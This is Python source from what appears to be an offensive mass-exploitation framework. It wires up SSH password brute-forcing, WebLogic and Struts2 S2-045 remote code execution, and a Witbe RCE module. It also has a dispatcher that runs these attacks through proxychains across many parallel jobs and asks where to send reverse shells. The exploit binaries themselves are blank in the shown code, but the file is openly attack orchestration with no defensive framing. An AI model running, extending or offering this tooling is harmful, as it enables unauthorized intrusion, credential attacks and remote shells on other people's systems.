def ssh_bruteforcer(): ''' call single thread ssh_bruteforcer ''' password_list = console.input_check( "[*] Password list file to use: ", allow_blank=False) if not os.path.isfile(password_list): console.print_error("[-] Password list not found") return [] # command to exec command = console.input_check("[*] Command to exec: ", allow_blank=False) # args list exploit = '' work_path = '/ssh-bruteforce/' exec_path = exploit custom_args = str(password_list + ' ' + command).split() jobs = 100 print(colors.BLUE + '[*] Your exploit will be executed like\n' + colors.END, 'proxychains4 -q -f proxy.conf {} {} -t <target ip>'.format(exec_path, ' '.join(custom_args))) # start scanner scanner_args = console.ScannerArgs(work_path, exec_path, custom_args, jobs) return scanner_args
def weblogic(): ''' with reverse shell ''' print(colors.BLUE + '\n[*] Welcome to Weblogic getshell exploit' + colors.END) server_port = console.input_check( "[?] What's the port of Welogic server? ", check_type=int) os_type = console.input_check( '[?] Windows or Linux? [w/l] ', choices=['w', 'l']) if console.input_check('[?] Do you need a reverse shell? [y/n] ', choices=['y', 'n']) == 'y': shell_server = console.input_check( '[?] What\'s the IP of shell receiver? ', allow_blank=False, ip_check=True) port = console.input_check( '[?] What\'s the port of shell receiver? ', check_type=int) if os_type.lower() == 'w': custom_args = '-l {} -p {} -P {} --silent -T '.format( shell_server, port, server_port) +\ 'reverse_shell -os win' custom_args = custom_args.split() elif os_type.lower() == 'l': custom_args = '-l {} -p {} -P {} --silent -T '.format( shell_server, port, server_port) +\ 'reverse_shell -os linux' custom_args = custom_args.split() else: console.print_error('[-] Invalid input') return [] else: cmd = console.input_check( '[?] What command do you want to execute on the target? ', allow_blank=False).strip() if os_type.lower() == 'w': custom_args = '-P {} --silent -T exploit -c {} -os win'.format( server_port, cmd).split() elif os_type.lower() == 'l': custom_args = '-P {} --silent -T exploit -c {} -os linux'.format( server_port, cmd).split() else: return [] # start scanner exploit = '' work_path = '/weblogic/' exec_path = exploit jobs = 100 # waitTime = 25 # deprecated scanner_args = console.ScannerArgs(work_path, exec_path, custom_args, jobs) return scanner_args
def witbe(): ''' witbe rce ''' print(colors.BLUE + '\n[*] Welcome to Witbe RCE' + colors.END) # shell server config rhost = console.input_check('[?] IP of your shell server: ') rport = console.input_check('[?] and Port? ', check_type=int) # exploit config exploit = '' work_path = '/witbe/' exec_path = exploit custom_args = str('-l ' + rhost + ' -p ' + rport).split() jobs = 50 print(colors.BLUE + '[*] Your exploit will be executed like\n' + colors.END, 'proxychains4 -q -f proxy.conf {} -t <target ip>'.format(exec_path), ' '.join(custom_args)) # start scanner scanner_args = console.ScannerArgs(work_path, exec_path, custom_args, jobs) return scanner_args
def s2_045(): ''' struts2 045 rce ''' print(colors.BLUE + '\n[*] Welcome to S2-045' + colors.END) port = console.input_check( '[?] What\'s the port of your target server? ', check_type=int) # args list exploit = '' work_path = '/structs2/' exec_path = exploit custom_args = str('-p ' + port).split() jobs = 100 print(colors.BLUE + '[*] Your exploit will be executed like\n' + colors.END, 'proxychains4 -q -f proxy.conf {} {} -t <target ip>'.format(exec_path, ' '.join(custom_args))) # start scanner scanner_args = console.ScannerArgs(work_path, exec_path, custom_args, jobs) return scanner_args
def attack(): ''' handles attack command ''' SESSION.use_proxy = input_check( '[?] Do you wish to use proxychains? [y/n] ', choices=['y', 'n']) == 'y' if SESSION.use_proxy: if shutil.which("proxychains4") is None: console.print_error("proxychains4 not found") return execute("proxy") answ = input_check('\n[?] Do you wish to use\ \n\n [a] built-in exploits\ \n [m] or launch your own manually?\ \n\n[=] Your choice: ', choices=['a', 'm']) if answ == 'a': print(colors.CYAN + colors.BOLD + '\n[?] Choose a module from: ' + colors.END + '\n') print(console.BUILT_IN) answ = input_check('[=] Your choice: ', check_type=int, choices=['0', '1', '2', '3', '4']) try: if answ == '0': scanner(exploit_exec.ssh_bruteforcer()) elif answ == '1': scanner(exploit_exec.weblogic()) elif answ == '2': console.print_error("[-] Not available") elif answ == '3': console.print_error("[-] Not available") elif answ == '4': scanner(exploit_exec.s2_045()) except (EOFError, KeyboardInterrupt, SystemExit): return elif answ == 'm': print(colors.CYAN + colors.UNDERLINE + colors.BOLD + "\nWelcome, in here you can choose your own exploit\n" + colors.END) colored_print('[*] Here are available exploits:\n', colors.CYAN) for poc in list_exp(): colored_print(poc + colors.END, colors.BLUE) exploit = input_check( "\n[*] Enter the path (eg. joomla/ of your exploit: ", choices=list_exp()) jobs = int( input_check("[?] How many processes each time? ", check_type=int)) custom_args = [] answ = input_check("[?] Do you need a reverse shell [y/n]? ", choices=['y', 'n']) if answ == 'y': lhost = input_check("[*] Where do you want me to send shells? ", allow_blank=False, ip_check=True) lport = input_check("[*] and at what port?", check_type=int) custom_args = ['-l', lhost, '-p', lport] else: pass custom_args += input_check( "[*] args for this exploit: ").strip().split() # parse user's exploit name exec_path = exploit.split('/')[1:] work_path = exploit.split('/')[:-1] exec_path = '/'.join(exec_path) work_path = '/'.join(work_path) # let user check if there's anything wrong print( colors.BLUE + '[*] Your exploit will be executed like\n' + colors.END, 'proxychains4 -q -f proxy.conf {} -t <target ip>'.format( exec_path), ' '.join(custom_args)) # args as parameter for scanner scanner_args = console.ScannerArgs(work_path, exec_path, custom_args, jobs) # start scanner scanner(scanner_args) else: console.print_error('[-] Invalid input')